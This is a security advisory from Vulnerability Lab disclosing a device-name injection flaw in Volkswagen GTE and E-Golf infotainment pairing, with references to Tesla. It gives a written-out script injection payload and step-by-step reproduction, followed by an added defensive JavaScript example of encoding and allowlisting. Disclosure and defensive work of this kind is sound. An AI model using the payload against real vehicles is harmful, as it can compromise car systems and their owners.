Volkswagen (GTE&E) - (Interface Pair) Code Execution
Document Title:
===============
Volkswagen (GTE&E) - (Interface Pair) Code Execution


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1606


Release Date:
=============
2016-10-02


Vulnerability Laboratory ID (VL-ID):
====================================
1606


Common Vulnerability Scoring System:
====================================
7.6


Vulnerability Class:
====================
Filter or Protection Mechanism Bypass


Current Estimated Price:
========================
10.000€ - 25.000€


Product & Service Introduction:
===============================
Volkswagen is a German car manufacturer headquartered in Wolfsburg, Lower Saxony, Germany. 
Established in 1937, Volkswagen is the top-selling and namesake marque of the Volkswagen Group, 
the holding company created in 1975 for the growing company, and is now the biggest automaker globally. 
Volkswagen has three cars in the top 10 list of best-selling cars of all time compiled by the website 
24/7 Wall St.: the Volkswagen Golf, the Volkswagen Beetle, and the Volkswagen Passat. With these three 
cars, Volkswagen has the most cars of any automobile manufacturer in the list that are still being 
manufactured. Volkswagen places a top priority on things like perfection and tradition when it comes to 
electric vehicles. When we develop electric cars and plug-in hybrids our guiding principle is to achieve 
sustainable transport without making any compromises. Here is a look at all the vehicles in our portfolio. 
Combining the efficiency of an electric engine with the power of a combustion engine, the new Passat GTE 
makes the perfect companion for almost every occasion.

(Copy of the Vendor Homepage: http://emobility.volkswagen.de/int/en/private/cars/ )


Abstract Advisory Information:
==============================
The Evolution Security GmbH and the Vulnerability Laboratory Core Research Team discovered, during a private customer 
penetration test, a high severity code execution vulnerability in the official Volkswagen (GTE & E) automobile hardware components.


Vulnerability Disclosure Timeline:
==================================
2016-10-02: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
An application-side code execution vulnerability, in combination with a command injection issue, has been 
discovered in the official Volkswagen (electric GTE & E-Golf) automobiles. The vulnerability allows an attacker to 
inject application-side code via the command injection and turn it into real script code execution in the 
embedded car interface that is connected to the hardware components.

The vulnerability is located in the pair function of the cars when the device name is processed. 
After pairing, the device name becomes available to the full interface of the Tesla or Volkswagen 
electric automobile. This is the vector we used to attack the core system of the car. iOS devices allow 
the device name to be changed to any value, including special characters and other characters.

Our team injected a payload into the device name. After that we installed a web-server app on the iOS 
device (iPhone 5s) and prepared some manipulated interface files in JS locally for the final refresh 
(execution). We then paired the mobile with the automobiles and activated the scripts 
in the interface by opening the configuration settings via push. In the Volkswagen electric cars the 
payload executes directly after sync; in a Tesla car you need to watch the sync information to 
finally execute the code. After the code executes in the VW car display interface, 
the view needs to be refreshed. Once synchronized, the mobile joins the local car Wi-Fi network, 
which allows us to browse locally to the web-server by clicking the payload in the car interface.

In the end we were able to manipulate the display information of the Volkswagen automobile and the 
interface of the Tesla. Through a reverse communication channel it is also possible to circumvent hardware-specific 
functions and finally compromise the car by interacting with the hardware. The issue is present in both 
car types because the device name is handled the same way in the Volkswagen car entertainment 
system and in the embedded browser interface.

Both parties include the device name without a secure implementation routine to filter the input, which 
finally results in the execution. Regular script code tags and frames are already filtered.

The security risk of the persistent input validation and mail encoding web vulnerability is estimated as high, 
with a CVSS (Common Vulnerability Scoring System) count of 7.6. Exploitation of the application-side command 
injection vulnerability with embedded script code execution results in the compromise of the car interface and 
continuous manipulation of connected devices, firmware or hardware components.

Vulnerable Module(s):
[+] Pair - (Wifi & Bluetooth)

Affected Module(s):
[+] Display - Volkswagen

Affected Automobile(s):
[+] Volkswagen - Electro GTE & E-Golf


Proof of Concept (PoC):
=======================
The application-side validation vulnerability in the VW car interface can be exploited 
by remote attackers with embedded device access privileges and without user interaction. For a security demonstration 
or to reproduce the security vulnerability, follow the information and steps provided below.

Requirement(s):
[+] iPhone 5s or iPad 2 (iOS 7.x or 8.x)
[+] Bluetooth or Wifi (Adapter or Hardware Implementation connected to the mobile Device)
[+] Wifi app for the mobile that uses a local web-server in the local network environment
[+] Volkswagen - Electro GTE & E-Golf with the new industrial interfaces (2015)


Optional Requirement(s):
[+] Network sniffer placed between the local and mobile connection (for the local network and mobile device during the pair interaction)


Manual steps to reproduce the vulnerability ...
1. Set up an iOS device, for example an iPhone or an iPad
2. Install a web-server for Wi-Fi or Bluetooth that becomes available in the local network environment
3. Activate Bluetooth or Wi-Fi (Wi-Fi is preferable because of the web-server)
4. Now go to Info > Settings > Device Name on the iOS device (iPhone or iPad) and inject a script code payload that is able to bypass the validation
PoC Payload: "benjamin1&{alert('CarInterfaceUpdate')};%20>"<<a onmouseover=http://localhost:8080/index>refresh-volkswagen-webkit-interface&%20<img
src="http://localhost:8080/interface.js"></a>
5. Save the device name input so that the value is finally changed
6. Now start the pair function of the Volkswagen electric car interface and sync the mobile
Note: After the sync via pair, the device name of the mobile becomes available in the display of the Volkswagen electric car interface
7. Do not accept, and watch the payload in the sync message
8. The payload executes in the interface on preview
9. Now the attacker interacts by starting the local web-server with the files that are stored for the simulation of the exploitation
10. After the web-server has started successfully in the car Wi-Fi network, the attacker can click the payload to execute it via a page refresh in the new web-server context
Note: Refresh by pushing the link payload in the interface; this interaction triggers the exploit code
11. The attacker is now able to change the interface output and can interact to execute code against hardware-specific points
12. Successful reproduction of the code execution vulnerability in connection with the device name value encoding!

Note: We were finally able to take over the Volkswagen car interface infotainment system by interaction with a compromised device 
that uses a web-server next to the main pair interaction. Even though the Volkswagen electric cars differ from Tesla in the nature 
of the pair implementation, the device name permission is the same. Maybe other entertainment systems or operating systems are affected as well. 
After recording the information with a network sniffer we were able to extract the packet information on sync to provoke an execution 
without the device via a man-in-the-middle attack.


Solution - Fix & Patch:
=======================
The security vulnerability in the interface of the Tesla cars or the Volkswagen automobile can be patched by securely parsing and encoding the 
device name value when processing the pair (sync). Restrict the input that can be displayed and filter for malicious content 
that would become visible in the interface or display, to prevent an execution. Include an exception to prevent active exploitation after the 
pair interaction by a user.
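The filter weakness the Technical Details describe (script and frame tags stripped, other markup passed through) and the encode-and-restrict fix recommended above, as an added JavaScript example that is not Volkswagen's, Tesla's or the advisory author's code; the function names, the allowlist limits and the sample device names are constructed assumptions.

```javascript
// Added example (not Volkswagen's or Vulnerability Lab's code): a paired device's name
// inserted into an HTML-based infotainment view. Function names and limits are assumptions.

// Blacklist filter of the kind the advisory describes as already present: it strips
// <script> and <frame>/<iframe> tags and nothing else.
function blacklistFilter(name) {
  return name.replace(/<\s*\/?\s*(script|i?frame)\b[^>]*>/gi, "");
}

// HTML entity encoding for the element-content context: every character that can
// open markup becomes an entity, so the name is always data, never structure.
function htmlEncode(str) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return str.replace(/[&<>"']/g, (c) => map[c]);
}

// Input restriction at pair time: allowlist of letters, digits, space and a few
// punctuation marks, capped at 32 characters (constructed limits, not the vendor's).
const DEVICE_NAME_RE = /^[\p{L}\p{N} _.'-]{1,32}$/u;
function acceptDeviceName(name) {
  return DEVICE_NAME_RE.test(name);
}

// Defence in depth: reject names that fail the allowlist, encode the ones that pass.
// Returns the fragment the display would insert, or null when the name is rejected.
function renderPairedDevice(name) {
  if (!acceptDeviceName(name)) return null;
  return `<li class="paired-device">${htmlEncode(name)}</li>`;
}

// True when sanitized text still contains a tag a WebKit view would interpret.
function containsLiveMarkup(text) {
  return /<[a-z][^>]*>/i.test(text);
}

// Constructed sample names: a benign one and one shaped like the advisory's payload
// (an <a> element with an onmouseover handler wrapping an <img> that loads a script).
const BENIGN_NAME = "Ben's iPhone";
const HOSTILE_NAME = 'Ben<a onmouseover=x>phone<img src="http://localhost:8080/x.js"></a>';

// Blacklist alone leaves the hostile name untouched; encoding turns it into inert text,
// and the allowlist rejects it before it is ever rendered.
console.log("blacklist still live markup:", containsLiveMarkup(blacklistFilter(HOSTILE_NAME)));
console.log("encoded still live markup:  ", containsLiveMarkup(htmlEncode(HOSTILE_NAME)));
console.log("rendered benign:", renderPairedDevice(BENIGN_NAME));
console.log("rendered hostile:", renderPairedDevice(HOSTILE_NAME));
```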


Security Risk:
==============
The security risk of the command injection vulnerability in connection with the embedded code execution issue is estimated as high.


Credits & Authors:
==================
Benjamin K.M. [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™